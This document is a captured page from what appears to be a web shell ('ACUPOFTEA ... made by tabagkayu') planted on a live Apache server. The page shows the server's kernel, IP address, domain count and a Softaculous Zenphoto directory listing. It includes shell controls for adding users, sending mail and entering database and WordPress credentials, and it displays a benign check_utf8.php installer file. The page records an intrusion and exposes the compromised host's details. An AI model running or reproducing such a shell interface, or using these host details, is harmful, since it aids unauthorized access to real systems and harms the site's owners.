System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
zen
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
check_utf8.php
<?php function getCollationSetClause() { if (hasUtf8mb4Support('utf8mb4_520')) { // MySQL 5.6+ return ' CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci'; } else if (hasUtf8mb4Support('utf8mb4')) { // MySQL 5.5.3+ return ' CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci'; } else { return ' CHARACTER SET utf8 COLLATE utf8_unicode_ci'; } } function hasUtf8mb4Support($which = 'utf8mb4_520') { $db_version = getVersion(); if ($db_version) { // if not set no db functions available switch ($which) { case 'utf8mb4': if (isMariaDB() && version_compare($db_version, '5.5.0', '<')) { return false; } else if (version_compare($db_version, '5.5.3', '<')) { return false; } $client_version = mysqli_get_client_info(); /* * libmysql has supported utf8mb4 since 5.5.3, same as the MySQL server. * mysqlnd has supported utf8mb4 since 5.0.9. */ if (strpos($client_version, 'mysqlnd') !== false) { $client_version = preg_replace('/^\D+([\d.]+).*/', '$1', $client_version); return version_compare($client_version, '5.0.9', '>='); } else { return version_compare($client_version, '5.5.3', '>='); } case 'utf8mb4_520': return version_compare($db_version, '5.6', '>='); case 'general': return (hasUtf8mb4Support('utf8mb4') || hasUtf8mb4Support('utf8mb4_520')); } } return false; } function getVersion() { $software = getVersionComplete(); if ($software) { if (isMariaDB()) { preg_match("/\d+(\.\d+){2,}-MariaDB/", $software, $matches); if ($matches) { return str_replace('-MariaDB', '', $matches[0]); } return $software; // just in case⦠} else { return $software; } } return '0.0.0'; } function getVersionComplete() { global $connection; $connection = mysqli_connect("[[softdbhost]]","[[softdbuser]]","[[softdbpass]]","[[softdb]]"); if ($connection) { $query = mysqli_fetch_array(mysqli_query($connection, "SELECT version()")); if ($query) { return $query['version()']; } } return null; } function isMariaDB() { $db_version = getVersionComplete(); if ($db_version && stristr($db_version, 'mariadb')) { // version includes note if mariadb return true; } return false; } $charset_value = getCollationSetClause(); if(!empty($charset_value)){ echo '<charset_value>'.$charset_value.'</charset_value>'; } ?>
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-05-29 09:39:32
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-05-29 09:39:32
php53
DIR
-
drwxr-xr-x
2025-05-29 09:39:32
php56
DIR
-
drwxr-xr-x
2025-05-29 09:39:32
php71
DIR
-
drwxr-xr-x
2025-05-29 09:39:32
php81
DIR
-
drwxr-xr-x
2025-05-29 09:39:32
php82
DIR
-
drwxr-xr-x
2025-05-29 09:39:32
upgrade
DIR
-
drwxr-xr-x
2025-05-29 09:39:32
.htaccess
text/plain
630 B
-rw-r--r--
2021-12-23 06:54:36
NOTES.TXT
text/plain
2.03 KB
-rw-r--r--
2022-12-14 03:47:26
_.htaccess
text/plain
195 B
-rw-r--r--
2021-12-23 06:54:36
_index.php
text/x-php
5.16 KB
-rw-r--r--
2023-12-26 05:00:46
check_utf8.php
text/x-php
2.36 KB
-rw-r--r--
2024-03-13 01:46:46
clone.php
text/x-php
6.76 KB
-rw-r--r--
2025-05-28 08:14:34
edit.php
text/x-php
4.81 KB
-rw-r--r--
2025-05-28 08:14:34
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
favicon.ico
image/x-icon
1.37 KB
-rw-r--r--
2021-12-23 06:54:36
fileindex.php
text/plain
204 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
3.41 KB
-rw-r--r--
2025-05-28 08:14:34
index.php
text/x-php
5.01 KB
-rw-r--r--
2023-12-26 05:00:46
info.xml
text/html
4.61 KB
-rw-r--r--
2025-05-28 07:17:28
install.js
text/plain
924 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
10.77 KB
-rw-r--r--
2025-05-28 08:14:34
install.xml
text/html
1.61 KB
-rw-r--r--
2024-10-24 04:06:22
md5
text/plain
11.71 KB
-rw-r--r--
2025-05-28 08:14:34
robots.txt
text/plain
560 B
-rw-r--r--
2021-12-23 06:54:36
upgrade.php
text/x-php
9.26 KB
-rw-r--r--
2025-05-28 08:14:34
upgrade.xml
text/plain
277 B
-rw-r--r--
2022-12-14 03:47:26
zenphoto.cfg.php
text/x-php
4.41 KB
-rw-r--r--
2022-12-14 03:47:26
~ ACUPOFTEA - mail.ontime-ae.com